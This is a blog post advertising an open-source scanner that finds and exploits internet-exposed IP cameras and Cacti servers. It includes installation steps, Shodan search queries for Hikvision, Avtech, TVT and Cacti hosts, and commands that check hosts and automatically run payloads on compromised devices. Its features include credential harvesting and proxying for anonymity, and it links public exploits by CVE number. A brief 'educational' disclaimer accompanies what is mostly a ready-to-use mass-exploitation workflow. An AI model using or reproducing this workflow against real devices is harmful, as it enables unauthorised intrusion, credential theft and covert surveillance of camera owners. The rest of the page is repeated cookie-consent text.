Camera Exploit Tool Scanner to Exploit Cameras on the Internet
Camera Exploit Tool Scanner to Exploit Cameras on the Internet
Hacking
·2 min read

Camera Exploit Tool: Scanner to Exploit Cameras on the Internet

This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io

You can discover thousands of vulnerable cameras using it.

Using Camera Exploit Tool
Using Camera Exploit Tool
Getting exploit camera Internet
Getting exploit camera Internet
Exploited IP camera
Exploited IP camera

Vendors Affected

[+] Hikvision

[+] Avtech

"
"

[+] TVT

[+] Cacti

more to come…

Features

  • Fetching of hosts from shodan.io
  • Check for vulnerable cameras
  • Automatically run commands on exploited devices (Only Hikvision for now)
  • Automatically grab camera credentials (Only for Avtech)
  • Multi-threading for faster scanning
  • Usage of Socks5 proxies for anonymity
  • Storing results in Sqlite3 database
  • Logging all actions in log files

Prerequisites

To use this tool you need to have the following:

  • Shodan API key (Membership required for more than 1 page)
  • Socks5 authenticated proxies

Installation

It is as easy as typing the following commands.

git clone https://github.com/TasosY2K/camera-exploit-tool
pip install -r requirements.txt
python3 scanner.py --help

Usage

Collect hosts in database

# Collect Hikvision hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Hikvision IP Camera"' --pages 1

# Collect Avtech hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'linux upnp avtech' --pages 1

# Collect TVT hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Cross Web Server"' --pages 1

# Collect Cacti hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'Login to Cacti' --pages 1

Check hosts for exploit

python3 scanner.py --check --proxy-file proxies.txt --threads 20

Automatically run command on exploited hosts

See also
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"

Disclaimer

This tool is purely educational and is inteded to make the internet more secure

"
"

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Exploits Used

https://www.exploit-db.com/exploits/40500

2021-36260 https://www.exploit-db.com/exploits/50441

https://github.com/k1p0d/h264_dvr_rce

CVE-2022-46169 https://github.com/sAsPeCt488/CVE-2022-46169

Github Repo Here.

Privacy settings

Decide which cookies you want to allow. You can change these settings at any time. However, this can result in some functions no longer being available. For information on deleting the cookies, please consult your browser’s help function. Learn more about the cookies we use.

With the slider, you can enable or disable different types of cookies:

This website will

  • Remember which cookies group you accepted

This website won't

  • Remember your login details
  • Essential: Remember your cookie permission setting
  • Essential: Allow session cookies
  • Essential: Gather information you input into a contact forms newsletter and other forms across all pages
  • Essential: Keep track of what you input in a shopping cart
  • Essential: Authenticate that you are logged into your user account
  • Essential: Remember language version you selected
  • Functionality: Remember social media settings
  • Functionality: Remember selected region and country
  • Analytics: Keep track of your visited pages and interaction taken
  • Analytics: Keep track about your location and region based on your IP number
  • Analytics: Keep track of the time spent on each page
  • Analytics: Increase the data quality of the statistics functions
  • Advertising: Tailor information and advertising to your interests based on e.g. the content you have visited before. (Currently we do not use targeting or targeting cookies.
  • Advertising: Gather personally identifiable information such as name and location

This website will

  • Essential: Remember your cookie permission setting
  • Essential: Allow session cookies
  • Essential: Gather information you input into a contact forms newsletter and other forms across all pages
  • Essential: Keep track of what you input in a shopping cart
  • Essential: Authenticate that you are logged into your user account
  • Essential: Remember language version you selected

This website won't

  • Remember your login details
  • Functionality: Remember social media settings
  • Functionality: Remember selected region and country
  • Analytics: Keep track of your visited pages and interaction taken
  • Analytics: Keep track about your location and region based on your IP number
  • Analytics: Keep track of the time spent on each page
  • Analytics: Increase the data quality of the statistics functions
  • Advertising: Tailor information and advertising to your interests based on e.g. the content you have visited before. (Currently we do not use targeting or targeting cookies)
  • Advertising: Gather personally identifiable information such as name and location

This website will

  • Essential: Remember your cookie permission setting
  • Essential: Allow session cookies
  • Essential: Gather information you input into a contact forms newsletter and other forms across all pages
  • Essential: Keep track of what you input in a shopping cart
  • Essential: Authenticate that you are logged into your user account
  • Essential: Remember language version you selected
  • Functionality: Remember social media settings
  • Functionality: Remember selected region and country

This website won't

  • Analytics: Keep track of your visited pages and interaction taken
  • Analytics: Keep track about your location and region based on your IP number
  • Analytics: Keep track of the time spent on each page
  • Analytics: Increase the data quality of the statistics functions
  • Advertising: Tailor information and advertising to your interests based on e.g. the content you have visited before. (Currently we do not use targeting or targeting cookies)
  • Advertising: Gather personally identifiable information such as name and location

This website will

  • Essential: Remember your cookie permission setting
  • Essential: Allow session cookies
  • Essential: Gather information you input into a contact forms newsletter and other forms across all pages
  • Essential: Keep track of what you input in a shopping cart
  • Essential: Authenticate that you are logged into your user account
  • Essential: Remember language version you selected
  • Functionality: Remember social media settings
  • Functionality: Remember selected region and country
  • Analytics: Keep track of your visited pages and interaction taken
  • Analytics: Keep track about your location and region based on your IP number
  • Analytics: Keep track of the time spent on each page
  • Analytics: Increase the data quality of the statistics functions

This website won't

  • Advertising: Tailor information and advertising to your interests based on e.g. the content you have visited before. (Currently we do not use targeting or targeting cookies)
  • Advertising: Gather personally identifiable information such as name and location

This website will

  • Functionality: Remember social media settings
  • Functionality: Remember selected region and country
  • Analytics: Keep track of your visited pages and interaction taken
  • Analytics: Keep track about your location and region based on your IP number
  • Analytics: Keep track of the time spent on each page
  • Analytics: Increase the data quality of the statistics functions
  • Advertising: Tailor information and advertising to your interests based on e.g. the content you have visited before. (Currently we do not use targeting or targeting cookies)
  • Advertising: Gather personally identifiable information such as name and location

This website won't

  • Remember your login details
Save & Close